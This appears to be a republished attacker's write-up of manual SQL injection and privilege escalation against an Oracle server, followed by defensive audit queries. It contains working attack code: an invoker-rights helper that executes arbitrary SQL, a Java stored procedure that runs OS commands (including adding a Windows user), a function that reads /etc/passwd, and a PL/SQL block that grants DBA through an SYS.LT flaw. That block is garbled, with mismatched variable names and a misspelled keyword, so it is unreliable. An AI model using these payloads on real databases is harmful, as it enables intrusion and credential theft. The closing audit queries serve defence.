Notes on manual injection and privilege escalation in an Oracle database

Source: Internet
Author: User

Soon, I connected to the Oracle server and found that:

1. The DBA permission is not granted after the connection.

2. You cannot use SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to escalate permissions.

3. Running SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual shows that the Oracle server cannot connect to the network.

Fortunately, running

    create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end;

was successful! This user has the create procedure permission.

Now I want to create a Java extension for command execution:

    create or replace and compile java source named "LinxUtil" as
    import java.io.*;
    public class LinxUtil extends Object {
        public static String runCMD(String args) {
            try {
                BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
                String stemp, str = "";
                while ((stemp = myReader.readLine()) != null) str += stemp + "";
                myReader.close();
                return str;
            } catch (Exception e) {
                return e.toString();
            }
        }
    }

    begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<>', 'execute'); end;

    create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String';

    select * from all_objects where object_name like '%LINX%';

    grant all on LinxRunCMD to public;

    select LinxRunCMD('cmd/c net user linx/Dd') from dual;

But the first step gets stuck. The server cannot create Java extensions for some unknown reason!

Fortunately, we also have the UTL library available to use:

    create or replace function LinxUTLReadFile (FileName varchar2) return varchar2 is
        fHandler UTL_FILE.FILE_TYPE;
        buf varchar2(4000);
        output varchar2(8000);
    begin
        -- open the file through the UTL_FILE_DIR directory object
        fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', FileName, 'R');
        loop
            begin
                UTL_FILE.GET_LINE(fHandler, buf);
                DBMS_OUTPUT.PUT_LINE('cursor: ' || buf);
            exception
                -- GET_LINE raises NO_DATA_FOUND at end of file
                when no_data_found then exit;
            end;
            output := output || buf || chr(10);
        end loop;
        UTL_FILE.FCLOSE(fHandler);
        return output;
    end;

The UTL_FILE_DIR directory object must be specified first:

    create or replace directory UTL_FILE_DIR as '/etc';

However, no permission is found after running. I had to find a way to escalate privileges.

***************

I wrote N PDF files to introduce this technology. I simplified the code:

    DECLARE
        Skype NUMBER;
    BEGIN
        PY := DBMS_SQL.OPEN_CURSOR;
        DBMS_SQL.PARSE (ACC, 'descare pragma autonomous_transaction; begin execute immediate "GRANT DBA TO linxlinx_current_db_user"; commit; end; ', 0 );
        DBMS_OUTPUT.PUT_LINE ('cursor: ' || metrics );
        Begin sys.LT.FINDRICSET ('.' | dbms_sql.execute ('| YY |') | ")-', 'x'); END;
        Raise NO_DATA_FOUND;
    EXCEPTION
        WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE ('cursor: ' || ACC );
        WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE ('cursor: ' || ACC );
    END;

After the operation, reconnect to the database and you have the DBA permission.

Now you can read the file:

    create or replace directory UTL_FILE_DIR as '/etc';

    select LinxUTLReadFile('passwd') from dual;

It's easy to follow.
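
From the defender's side, the preconditions this post depends on can be audited in the data dictionary. The queries below are an added example, not part of the original post; they assume Oracle 12c or later (for DBA_USERS.ORACLE_MAINTAINED), an account that can read the DBA_* views, and a 7-day look-back window chosen only for illustration.

```sql
-- Added audit example; run as an account that can read the DBA_* views.
-- Assumes Oracle 12c or later (DBA_USERS.ORACLE_MAINTAINED).

-- 1. Who can create stored code or directory objects, or already holds DBA
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE',
                     'CREATE ANY DIRECTORY')
UNION ALL
SELECT grantee, 'ROLE ' || granted_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY 1, 2;

-- 2. Packages named in the post that PUBLIC may execute
SELECT owner, table_name
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC'
   AND privilege = 'EXECUTE'
   AND table_name IN ('UTL_HTTP', 'UTL_FILE', 'DBMS_SQL', 'DBMS_JAVA',
                      'DBMS_EXPORT_EXTENSION', 'LT');

-- 3. Directory objects that expose operating-system paths such as /etc
SELECT directory_name, directory_path
  FROM dba_directories
 WHERE directory_path LIKE '/etc%';

-- 4. Invoker-rights code in non-Oracle schemas that runs dynamic SQL,
--    the shape of the Linx_Query helper in the post
SELECT DISTINCT s.owner, s.name, s.type, s.line
  FROM dba_source s
  JOIN dba_procedures p
    ON p.owner = s.owner AND p.object_name = s.name
 WHERE p.authid = 'CURRENT_USER'
   AND UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
   AND s.owner IN (SELECT username FROM dba_users
                    WHERE oracle_maintained = 'N');

-- 5. Functions, Java sources and directories created in the last 7 days
--    (the window is an illustrative value)
SELECT owner, object_name, object_type, created
  FROM dba_objects
 WHERE object_type IN ('FUNCTION', 'JAVA SOURCE', 'DIRECTORY')
   AND created > SYSDATE - 7
 ORDER BY created;
```

Any row from query 3 or 4, or an unexpected grantee in query 1, is worth reviewing together with the audit trail for the same account.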
